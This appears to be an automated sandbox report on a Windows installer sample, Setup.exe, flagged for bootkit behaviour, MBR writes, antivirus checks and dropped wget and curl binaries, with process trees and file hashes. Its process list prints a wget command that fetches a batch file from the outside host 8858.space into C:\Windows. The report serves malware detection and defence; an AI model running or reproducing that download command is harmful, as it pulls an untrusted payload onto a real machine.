Malware Analysis Report

2024-09-23 12:37

Sample ID 240612-rgrlksxgnc
Target Setup.exe
SHA256 96e4ec16ccd374b8be624079f68012d1707af8e31f66885dfbacbde8b407f208
Tags
bootkit discovery persistence
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

96e4ec16ccd374b8be624079f68012d1707af8e31f66885dfbacbde8b407f208

Threat Level: Shows suspicious behavior

The file Setup.exe was found to show suspicious behavior.

Malicious Activity Summary

bootkit discovery persistence

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Checks installed software on the system

Writes to the Master Boot Record (MBR)

Checks for any installed AV software in registry

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-12 14:10

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 14:10

Reported

2024-06-12 14:11

Platform

win10v2004-20240508-en

Max time kernel

33s

Max time network

40s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Setup.exe"

Signatures

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A

Checks for any installed AV software in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Software\WOW6432Node\AVAST Software\Avast | C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp | N/A

Checks installed software on the system

discovery

Writes to the Master Boot Record (MBR)

bootkit persistence

Description | Indicator | Process | Target
File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\is-U93J1.tmp\VpnSetupWatchdog.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\a.bat | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A
File opened for modification | C:\Windows\Wget\bin\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A
File opened for modification | C:\Windows\s.txt | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A
File opened for modification | C:\Windows\Wget\bin\libiconv2.dll | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A
File opened for modification | C:\Windows\Wget\bin\libintl3.dll | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A
File opened for modification | C:\Windows\Wget\bin\libssl32.dll | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A
File opened for modification | C:\Windows\Wget\bin\wget.exe | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A
File opened for modification | C:\Windows\curl\curl.exe | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A
File opened for modification | C:\Windows\Set-up.exe | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4796 wrote to memory of 2328 | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | C:\Windows\SysWOW64\cmd.exe
PID 4796 wrote to memory of 2328 | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | C:\Windows\SysWOW64\cmd.exe
PID 4796 wrote to memory of 2328 | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | C:\Windows\SysWOW64\cmd.exe
PID 2328 wrote to memory of 4624 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\Set-up.exe
PID 2328 wrote to memory of 4624 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\Set-up.exe
PID 2328 wrote to memory of 4624 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\Set-up.exe
PID 2328 wrote to memory of 2916 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 2328 wrote to memory of 2916 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 2328 wrote to memory of 2916 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 2328 wrote to memory of 3856 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe
PID 2328 wrote to memory of 3856 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe
PID 2328 wrote to memory of 3856 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe
PID 4624 wrote to memory of 2024 | N/A | C:\Windows\Set-up.exe | C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp
PID 4624 wrote to memory of 2024 | N/A | C:\Windows\Set-up.exe | C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp
PID 4624 wrote to memory of 2024 | N/A | C:\Windows\Set-up.exe | C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp
PID 2328 wrote to memory of 1596 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\Wget\bin\wget.exe
PID 2328 wrote to memory of 1596 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\Wget\bin\wget.exe
PID 2328 wrote to memory of 1596 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\Wget\bin\wget.exe
PID 2024 wrote to memory of 4016 | N/A | C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp | C:\Users\Admin\AppData\Local\Temp\is-U93J1.tmp\VpnSetupWatchdog.exe
PID 2024 wrote to memory of 4016 | N/A | C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp | C:\Users\Admin\AppData\Local\Temp\is-U93J1.tmp\VpnSetupWatchdog.exe
PID 2024 wrote to memory of 4016 | N/A | C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp | C:\Users\Admin\AppData\Local\Temp\is-U93J1.tmp\VpnSetupWatchdog.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Setup.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Windows\a.bat" "

C:\Windows\Set-up.exe

C:\Windows\Set-up.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ver "

C:\Windows\SysWOW64\findstr.exe

findstr /IL "5.1."

C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp" /SL5="$401EA,20689414,209920,C:\Windows\Set-up.exe"

C:\Windows\Wget\bin\wget.exe

C:\Windows\Wget\bin\wget.exe -c -P "C:\Windows" "http://8858.space/rs/st/b.bat" --referer="alpha" --user-agent="avgvpn"

C:\Users\Admin\AppData\Local\Temp\is-U93J1.tmp\VpnSetupWatchdog.exe

"C:\Users\Admin\AppData\Local\Temp\is-U93J1.tmp\VpnSetupWatchdog.exe" /setup-pid:2024 /watchdog-watching-evt:Local\AvgVpnSetupWatchdogIsWatchingEvent /setup-log:"C:\Users\Admin\AppData\Local\Temp\Setup Log 2024-06-12 #001.txt"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8858.space | udp
US | 8.8.8.8:53 | avg.tools.avcdn.net | udp
US | 8.8.8.8:53 | analytics.ff.avast.com | udp

Files

C:\Users\Admin\AppData\Local\Temp\$inst\0002.tmp

MD5 c2228fd017a3c8834ae10f2c55d1bad3
SHA1 c19c01b335b1e8b163334e54586ffdeb7750a1a3
SHA256 c93ba3b649ff3e0aff7974da423702eae28975f65afd8eea4f1942c0da5abe86
SHA512 092ea49fa883c55069d7a8f3cfaa67db52c399e504168f80f3e5026af4bb23217544ed064239ecbc8fb64d6aa675f382397e436a055801b42b3e61392fa58663

C:\Windows\a.bat

MD5 3a42629bc4d36ba374debe5f247d17a0
SHA1 905c303362e994011942f41d1609d7540211fa20
SHA256 81a99b0caacfbf55933caee67eca6165e39b37d0d554ab7a170af490250838be
SHA512 76359b0c71aed2852c74c664a7488ec0ceb49371e5fef1c3f30b56cac66caa5291cbb6dc6d574936e5db462ac0989dd425360f647ba81e3601c465347f58508d

memory/4796-47-0x0000000000400000-0x0000000000449000-memory.dmp

C:\Windows\Set-up.exe

MD5 8ddd444ec6c15507f0fc107b28945559
SHA1 54573229e4f967d65d382d25e364f91b19986930
SHA256 6cb44d89a8fce1c83ac49aa333b2247ab7974ea11b4eccc36c52ec1987a3ebe4
SHA512 4de5eb4b41f696eeffbb835f0a6122190dd1b2946800204ab5458efa3781fe8177b17a3b6704ebc0f6c49aaa613b11560d5cd7df51d617748fdf9fe3a60ee420

memory/4624-51-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4624-54-0x0000000000401000-0x0000000000412000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp

MD5 d1d1c7b229162cb1634984439b665b95
SHA1 fc77b253db5d3b5342a1496d6614fc542da94b1a
SHA256 b9da54afd552e36956d1c28c8961f8680372dc7fcb87298f32ed3f465143943d
SHA512 3c32dc06c250fedf0c78b7f236c378eda14c9a7f22c5b6d9cdeafbd84f2b01b5dd421049c92ca495b4f4c30155ceef536b779cde253ab4947dc16e8c15d77787

C:\Windows\s.txt

MD5 9bb5208c5c9576614b5444f0cf56feac
SHA1 c1a7816131944842c6132b67a10349da667bd537
SHA256 d5a31703c2a34d39825c272342b02538ece2fd0a8d7d1adb15a338ede0cb2b51
SHA512 305581e79c585b99004c507b9a3403cf5832900d26d6af55113666c06d29ed2b92b34a579f83f1acaab5aa92e4080bee4208358c64a13d863706252e5f398c03

C:\Windows\Wget\bin\wget.exe

MD5 aa173375c21ea31b8cc615dccb54e43b
SHA1 a00ea43c0ebbed364a606da39526f1dbed37e91e
SHA256 cf02b7614fea863672ccbed7701e5b5a8fad8ed1d0faa2f9ea03b9cc9ba2a3ba
SHA512 55f6b509f1b2e9229d8a9526c8f50e696708c81d6339b59aaf807bc6283ed2e5277f654cd5ab77b018db5d5adeb02a64001080838fbfd79634ff88af0049a0d2

C:\Windows\Wget\bin\LIBEAY32.dll

MD5 6b854ffc12e5e2c32683a03714cf6c5d
SHA1 c8e5c0f57e18dfc5226ff0bd5bc63607e1754c66
SHA256 95550b81825ae3fb4298b0de1f7ebd116754d99483a6d73cc7271e002484a928
SHA512 92b8908875b3376d60b19bb0e812b678870c70d708a278c781bd7ad30fdc96464c2038d578152ab7c2e7394f089ba399a55b5d5d7b7179a321b1bd1ef28215bd

C:\Windows\Wget\bin\libssl32.dll

MD5 37580b9354e984bf7c1a2b4ed7fa824b
SHA1 f750f7b6214f5d03d4d6bb40a15b93b6f0820354
SHA256 5e0fae7ffec8ddbaa5d6be610ab99f6a3b671d957a6aa601091acb0dae1921dc
SHA512 78a02d26007ba9631c85e7b0d1209ed1b854c21e348986039bb74782240b432234db493a5ad0efc6100beb5e9c82633cb3b3e93e282aa686124ffc31e0483d5a

C:\Windows\Wget\bin\libintl3.dll

MD5 d202baa425176287017ffe1fb5d1b77c
SHA1 192e597d8ff0192f6c4e4643361f84277ed51121
SHA256 f48ce1866602b114e653c876334b771107559acf1c685373d2305034613958f0
SHA512 706d74c56ce8d08539c729bdb6c8d57c9a4b0a1c795b8574a1bb2c452358e1bfd5d4fca5a00ab7568dea4ae02c553ce6ab199b3c6418a44cb8915f7e26bd2988

C:\Windows\Wget\bin\libiconv2.dll

MD5 e0dc8c6bbc787b972a9a468648dbfd85
SHA1 0f73d47122080a0c5c423841b16f4e6c62d79aff
SHA256 6deedad652bfab7b09ebd0e06045810390b6ac6cb5aa9ef41c9daa5616181f22
SHA512 afef454b85fb28b41fc4261188fee7a3122e2986b2e1a47e66fce9005cb2ec69c47644115bc52b9719eed15707978262b80e18eedadd0b39ccf5f2b441654a13

C:\Users\Admin\AppData\Local\Temp\is-U93J1.tmp\SetupHelper.dll

MD5 ab64a924af4a4be440b2765823048936
SHA1 92e085c2ac3d3353ed6bdc019a88eaa4a57af876
SHA256 7c37d5ba3618cacda09d55af88aa881c27af607c3add483fc54c8911d771ba0d
SHA512 cd50eb228b4d89cad5767abe7f59e964e9e89293bf95318a6fb5e4e862a3b0222b268ad8643c9cd00d561e8fa6e30ff93e8b597c5822988061b882cf0d38dc64

memory/4624-75-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1596-77-0x0000000000400000-0x0000000000479000-memory.dmp

memory/1596-81-0x0000000067200000-0x00000000672FB000-memory.dmp

memory/1596-80-0x0000000060E40000-0x0000000060E5D000-memory.dmp

memory/1596-79-0x000000006C380000-0x000000006C3BE000-memory.dmp

memory/1596-78-0x0000000063080000-0x00000000631A8000-memory.dmp

memory/2024-76-0x0000000000400000-0x0000000000542000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-U93J1.tmp\VpnSetupWatchdog.exe

MD5 ac1a5aabf7b0eeb53e45578a5bb90137
SHA1 02518d40650346f2d0ab4266d853f47543c1405b
SHA256 b11b4412680909374f4a28adacdc802167101c8b7deb5c47a8ee40ca1e731800
SHA512 577cef7731cf5dcc1638fc11b060bc723e2d5e2e4472c7b693cb92f53ab839c4746f0cbd4bd66f2b054dc5a2cba4c167de88c20951880beb452bcdaebdc11e5d

memory/1596-88-0x000000006C380000-0x000000006C3BE000-memory.dmp

memory/1596-87-0x0000000063080000-0x00000000631A8000-memory.dmp

memory/1596-89-0x0000000060E40000-0x0000000060E5D000-memory.dmp

memory/1596-86-0x0000000000400000-0x0000000000479000-memory.dmp

memory/1596-90-0x0000000067200000-0x00000000672FB000-memory.dmp

memory/2024-92-0x0000000000400000-0x0000000000542000-memory.dmp

memory/2024-97-0x0000000000400000-0x0000000000542000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Setup Log 2024-06-12 #001.txt

MD5 11a78bfe3dc1bd339e19ff2138e153ce
SHA1 a3caa3267bd5d49be150a3ede31560f9f4f68340
SHA256 001a916579a53828e06f145874e382145d08273102bbbc8ec05cac7d1ceb6195
SHA512 93d0632c5e56197d445d3f1d072b5ac93f118804166bb6b9e4af98e7a5f3f72ad7d3dd1244843db927cf218c69c5274a93dd9661a5cd7db7b1ad30094a3e906f

memory/4624-100-0x0000000000400000-0x000000000043D000-memory.dmp